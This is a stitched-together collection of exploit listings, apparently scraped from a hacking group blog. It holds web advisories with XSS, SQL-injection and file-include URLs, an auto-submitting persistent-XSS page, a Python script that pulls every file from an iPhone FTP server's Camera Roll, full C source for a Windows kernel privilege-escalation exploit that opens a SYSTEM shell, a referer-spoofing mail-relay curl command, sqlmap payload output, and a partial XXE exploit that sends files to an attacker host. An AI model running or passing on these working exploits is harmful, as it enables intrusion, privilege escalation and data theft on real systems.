source: https://www.securityfocus.com/bid/53181/info
Anchor CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible.
Anchor CMS 0.6-14-ga85d0a0 is vulnerable; other versions may also be affected.
<html>
<title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
</script>
<form action="http://www.example.com/anchorcms/index.php/admin/users/login" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="user" value='"><script>alert(1);</script>' />
<input type="hidden" name="pass" value="admin" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/amnesia" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/posts/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="comments" value="1" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="html" value="1" />
<input type="hidden" name="js" value="" />
<input type="hidden" name="slug" value='"><script>alert(2);</script>' />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/pages/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="hidden" name="content" value="Zero Science Lab" />
<input type="hidden" name="slug" value="ZSL" />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="real_name" value='"><script>alert(1);</script>' />
<input type="hidden" name="bio" value="MK" />
<input type="hidden" name="email" value='"><script>alert(3);</script>' />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="role" value="administrator" />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="username" value='"><script>alert(2);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/metadata" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="auto_published_comments" value="1" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="home_page" value="1" />
<input type="hidden" name="posts_page" value="1" />
<input type="hidden" name="posts_per_page" value="1" />
<input type="hidden" name="save" value="" />
<input type="hidden" name="sitename" value='"><script>alert(2);</script>' />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="twitter" value='"><script>alert(3);</script>' />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href='http://www.example.com/anchorcms/index.php/"><script>alert(1);</script>'>XSS 6</a>
</body></html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863143473
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
#==================================================================================
# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
# Date: 2015-05-25
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Exploit Author's Homepage: http://www.mikeallen.org
# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
# Version: 3.0
# Tested on: iPhone
#==================================================================================
# ------------------
# Denial of Service:
# ------------------
# The FTP server does not properly handle errors raised by invalid
# FTP commands. The following command, which sends an invalid PORT command to
# the FTP server, will crash the server once it is received.
# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000
# ----------------------
# Authentication Bypass:
# ----------------------
# The FTP server does not handle unauthenticated connections or incorrect login
# credentials properly. A remote user can issue commands to the FTP server
# without authenticating or after entering incorrect credentials.
# The following proof-of-concept connects to the given FTP server and
# downloads all files stored in the "Camera Roll" folder without providing a
# username or password:
import sys
from ftplib import FTP
if len(sys.argv) <= 1:
print "Usage: ./ftp-nologin.py [host] [port]"
exit()
host = sys.argv[1]
port = int(sys.argv[2])
files = []
def append_file(s):
files.append(s.split(' ')[-1])
blocks = []
def get_blocks(d):
blocks.append(d)
ftp = FTP()
print ftp.connect(host, port)
ftp.set_pasv(1)
ftp.cwd("Camera Roll")
print ftp.retrlines('LIST', append_file)
files.pop(0)
for filename in files:
print "Downloading %s..." % filename
ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)
f = open(filename, 'wb')
for block in blocks:
f.write(block)
f.close()
print "[+] File saved to: %s" % filename
blocks = []
ftp.quit()
// ex.cpp
/*
Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
CVE-2015-0003
March 2015 (Public Release: May 24, 2015)
Tested on:
x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
x64: Win 2k8 SP1 | Win 2k8 R2 SP1
Author: Skylake - skylake <at> mail <dot> com
*/
#include "ex.h"
_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;
DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}
BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
{
DWORD_PTR dwIndex, dwMask;
#ifdef _M_X64
dwMask = ~0xf;
#else
dwMask = ~7;
#endif
//
dwCurrentValue &= dwMask;
for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
{
if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
{
//
pdwStructure[dwIndex] = dwNewValue;
return TRUE;
}
}
return FALSE;
}
BOOL WINAPI Init()
{
HMODULE hMod = NULL;
PVOID Base = NULL;
OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
PSYSTEM_MODULE_INFORMATION pm = NULL;
BOOL RetVal = FALSE;
__try {
if( !GetVersionEx( &ov ) ) __leave;
if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
{
atom = 0xc039;
}
else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
{
atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
}
if( !atom ) __leave;
_ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
if( !ZwQuerySystemInformation ) __leave;
ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
if( !ZwAllocateVirtualMemory ) __leave;
ULONG len;
LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
if( !status ) __leave;
pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
if( !pm ) __leave;
status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
if( status ) __leave;
CHAR szKrnl[MAX_PATH] = { 0 }, *t;
for( ULONG i = 0; i < pm->Count; ++i )
{
if( strstr( pm->Module[i].ImageName, "exe" ) )
{
t = strstr( pm->Module[i].ImageName, "nt" );
if( t )
{
strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
Base = pm->Module[i].Base;
break;
}
}
}
hMod = LoadLibraryA( szKrnl );
if( !hMod || !Base ) __leave;
PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
if( !PsLookupProcessByProcessId ) __leave;
PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );
PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );
if( !PsReferencePrimaryToken ) __leave;
PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
Pid = GetCurrentProcessId();
RetVal = TRUE;
}
__finally {
if( pm ) LocalFree( pm );
if( hMod ) FreeLibrary( hMod );
}
return RetVal;
}
LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
LPVOID pCurProcess = NULL;
LPVOID pSystemInfo = NULL;
PACCESS_TOKEN systemToken;
PACCESS_TOKEN targetToken;
PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );
targetToken = PsReferencePrimaryToken( pCurProcess );
systemToken = PsReferencePrimaryToken( pSystemInfo );
//
find_and_replace_member( ( PDWORD_PTR ) pCurProcess,
( DWORD_PTR ) targetToken,
( DWORD_PTR ) systemToken,
0x200 );
KrnlMode = TRUE;
return 0;
}
VOID WINAPI leave()
{
keybd_event( VK_ESCAPE, 0, 0, NULL );
keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
}
LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
{
if( bSpawned )
{
leave();
ExitProcess( 0 );
}
switch( message )
{
case WM_CREATE:
SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
FlashWindow( hWnd, TRUE );
keybd_event( VK_LWIN, 0, 0, NULL );
break;
case WM_CLOSE:
DestroyWindow( hWnd );
break;
case WM_DESTROY:
PostQuitMessage( 0 );
break;
case WM_TIMER:
KillTimer( hWnd, ID_TIMER );
leave();
DestroyWindow( hWnd );
break;
default:
return DefWindowProc( hWnd, message, wParam, lParam );
}
return 0;
}
int APIENTRY _tWinMain( _In_ HINSTANCE hInstance,
_In_opt_ HINSTANCE hPrevInstance,
_In_ LPTSTR lpCmdLine,
_In_ int nCmdShow )
{
WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
HWND hWnd = NULL;
MSG Msg = { 0 };
SIZE_T size = 0x1000;
LPVOID addr = ( LPVOID ) 1;
if( !Init() ) return 1;
if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
{
//
return 1;
}
DWORD_PTR p = pti();
if( !p ) return 1;
#ifdef _M_X64
*( ( PDWORD_PTR ) 0x10 ) = p;
*( ( LPBYTE ) 0x2a ) = 4;
*( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
*( ( PDWORD_PTR ) 0xa8 ) = 0x400;
*( ( LPDWORD ) 0x404 ) = 1;
*( ( PDWORD_PTR ) 0x408 ) = 0x800;
*( ( LPWORD ) 0x410 ) = atom;
*( ( LPBYTE ) 0x412 ) = 1;
#else
*( ( LPDWORD ) 0x08 ) = p;
*( ( LPBYTE ) 0x16 ) = 4;
*( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
*( ( LPDWORD ) 0x6c ) = 0x400;
*( ( LPDWORD ) 0x404 ) = 1;
*( ( LPDWORD ) 0x408 ) = 0x800;
*( ( LPWORD ) 0x40c ) = atom;
*( ( LPBYTE ) 0x40e ) = 1;
#endif
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = TEXT( "Class" );
if( !RegisterClassEx( &wc ) )
return 1;
hWnd = CreateWindowEx(
WS_EX_CLIENTEDGE,
TEXT( "Class" ),
TEXT( "Window" ),
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 200, 100,
NULL, NULL, hInstance, NULL );
if( !hWnd )
return 1;
ShowWindow( hWnd, SW_HIDE );
UpdateWindow( hWnd );
while( GetMessage( &Msg, NULL, 0, 0 ) )
{
if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
{
if( !KrnlMode )
{
Msg.hwnd = ( HWND ) NULL;
}
else
{
Msg.hwnd = hWnd;
if( !bSpawned )
{
ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
bSpawned = TRUE;
}
}
}
TranslateMessage( &Msg );
DispatchMessage( &Msg );
}
return ( int ) Msg.wParam;
}
// EOF
//ex.h
#pragma once
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) (
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_In_ ULONG_PTR ZeroBits,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG AllocationType,
_In_ ULONG Protect
);
typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) (
_In_ HANDLE ProcessId,
_Out_ PVOID *Process
);
typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) (
_Inout_ PVOID Process
);
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) (
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
#define ID_TIMER 0x1
#define WM_SYSTIMER 0x118
// EOF
source: https://www.securityfocus.com/bid/53202/info
Waylu CMS is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.
HTML Injection
http://www.example.com/WebApps/products_xx.php?id=[XSS]
SQL Injection
http://www.example.com/WebApps/products_xx.php?id=[SQL Injection]
source: https://www.securityfocus.com/bid/53208/info
The CCNewsLetter module for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CCNewsLetter 1.0.7 is vulnerable; prior versions may also be affected.
http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
source: https://www.securityfocus.com/bid/53237/info
The Video Gallery component for Joomla! is prone to local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
http://www.example.com/index.php?option=com_videogallery&Itemid=68'
http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]--
http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00
source: https://www.securityfocus.com/bid/53268/info
concrete5 is prone to information-disclosure, SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to harvest sensitive information, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
concrete5 5.5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata
http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form
source: https://www.securityfocus.com/bid/53273/info
Quick.CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Quick.CMS 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/admin/?p=[xss]
source: https://www.securityfocus.com/bid/53269/info
gpEasy is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
gpEasy 2.3.3 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1>
######################
# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page
# Exploit Author : Claudio Viviani
# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
# Dork Google: index of "contus-video-gallery"
# Date : 2015-04-05
# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox
######################
# Description
Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.
This vulnerability is exploitable to dos, phishing, mailbombing, spam...
The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)
/**
* Email function
*/
add_action( 'wp_ajax_email', 'email_function' );
add_action( 'wp_ajax_nopriv_email', 'email_function' );
function email_function() {
require_once( dirname( __FILE__ ) . '/email.php' );
die();
}
Any user can send email from /contus-video-gallery/email.php to any recipients.
The variables used to send emails are:
$to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
$from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
$url = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
$subject = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$title = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
$referrer = parse_url( $_SERVER['HTTP_REFERER'] );
$referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
$pageURL = 'http';
It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:
if ( $referrer_host === $pageURL ) {
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$headers .= "From: " . "<" . $from . ">\r\n";
$headers .= "Reply-To: " . $from . "\r\n";
$headers .= "Return-path: " . $from;
$username = explode('@' , $from );
$username = ucfirst($username['0']);
$subject = $username . ' has shared a video with you.';
$emailtemplate_path = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';
$message = file_get_contents( $emailtemplate_path);
$message = str_replace( '{subject}', $subject, $message );
$message = str_replace( '{message}', $message_content, $message);
$message = str_replace( '{videourl}',$url,$message );
$message = str_replace('{username}',$username ,$message );
if ( @mail( $to, $title, $message, $headers ) ) {
echo 'success=sent';
} else {
echo 'success=error';
}
} else {
echo 'success=error';
}
The “Referer” field can easily be modified by the attacker!
######################
# PoC
curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
-e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email
cUrl switch "-e" spoof referer address
# Http Response
success=sent
# Poc Video
http://youtu.be/qgOGPm1-tNc
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
$where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
}
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.
# Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/landing-pages/
# Active installs: 20,000+
# Vulnerable version: 1.8.4
# Fixed version: 1.8.5
# CVE: CVE-2015-4064, CVE-2015-4065
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89] (CVE-2015-4064)
-----------------------------------------------
* CODE:
modules/module.ab-testing.php:100
+++++++++++++++++++++++++++++++++++++++++
$wpdb->query("
SELECT `meta_key`, `meta_value`
FROM $wpdb->postmeta
WHERE `post_id` = ".$_GET['post']."
");
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post
[............]
GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Parameter: post (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation
---
[13:35:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated XSS [CWE-79] (CVE-2015-4065)
----------------------------------------------
* CODE:
shared/shortcodes/inbound-shortcodes.php:761
+++++++++++++++++++++++++++++++++++++++++
<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post='></iframe><script>alert(String.fromCharCode(88, 83, 83))</script>
Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response.
2015-05-22: Vendor fix.
2015-05-25: Public disclosure.
#!/usr/bin/env python
"""
# Exploit Title: Jackrabbit WebDAV XXE
# Date: 25-05-2015
# Software Link: http://jackrabbit.apache.org/jcr/
# Exploit Author: Mikhail Egorov
# Contact: 0ang3el () gmail com
# Website: http://0ang3el.blogspot.com
# CVE: CVE-2015-1833
# Category: webapps
1. Description
Jackrabbit WebDAV plugin use insecurely configured XML parser to parse
incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to
XXE attacks.
Besides Jackrabbit JCR, WebDAV plugin is incorporated into the following
software: Apache Sling, Adobe AEM.
2. Proof of Concept
Download vulnerable Apache Sling launchpad web application from here -
https://sling.apache.org
Start launchpad web application as follows:
root@kali:~/build-sling# java -jar
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
Launch exploit with the following command:
root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe
--tech oob --ip 127.0.0.1
enter command> get .
loaded 210 bytes in buffer
enter command> show
apache-maven-3.0.5
apache-maven-3.0.5-bin.tar.gz
derby.log
eclipse
hs_err_pid5379.log
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
python-workspace
enter command> store /tmp/cwd.lst
buffer content has been stored in file /tmp/cwd.lst
enter command> exit
root@kali:~#
Exploit have three exploitation techniques:
* inb1 - inbound XXE technique, it first writes content as attribute value
of controllable JCR node using PROPPATCH request and then retrieves content
using PROPFIND request
* inb2 - same as inb1, but there is some XML magic to retrieve content that
is not valid XML data
* oob - out-of-bound technique, utilizes FTP hack from this blog
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Technique inb2 is the most stable. But it requires credentials of the user
that is able to modify some JCR node. Attacker host must have "visible ip"
which is required for communication between target and attacker's host.
Technique oob works even with anonymous credentials. But it is not so
stable as inb2 technique.
Technique inb1 does not require "visible ip", but there are limitations on
retrieved content.
3. Solution:
If you use Apache Jackrabbit, install version 2.10.1.
http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt
"""
from urllib2 import *
import sys, string, random
import base64
import xml.etree.ElementTree as ET
import BaseHTTPServer, SimpleHTTPServer
from multiprocessing import Process, Value, Manager
from optparse import OptionParser
import socket, select
usage= """
%prog --url <url> --tech inb1 [ --creds <creds> ]
%prog --url <url> --tech inb2 --ip <ip> [ --creds <creds> --hport <hport> ]
%prog --url <url> --tech oob --ip <ip> [ --creds <creds> --hport <hport> --fport <fport>]
"""
help_interpreter = """
help - print this help.
get <dir or file> - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing).
show - show content of internal buffer.
store <out file> - store internal buffer in file.
exit - stop exploiting
"""
failure_descr = """
Possible reasons:
1. Inappropriate technique, try another options.
2. You do not have permissions to read file or list directory.
3. Target is not exploitable.
"""
rand_attr = ''
script_name = sys.argv[0].split('/')[-1]
buffer_with_loot = ''
url, tech, ip, creds, hport, fport = [None] * 6
http_server, ftp_server = [None] * 2
class HTTP_XXE():
def __init__(self, ip, port, fport):
self.port = port
self.ip = ip
self.fport = fport
def run(self):
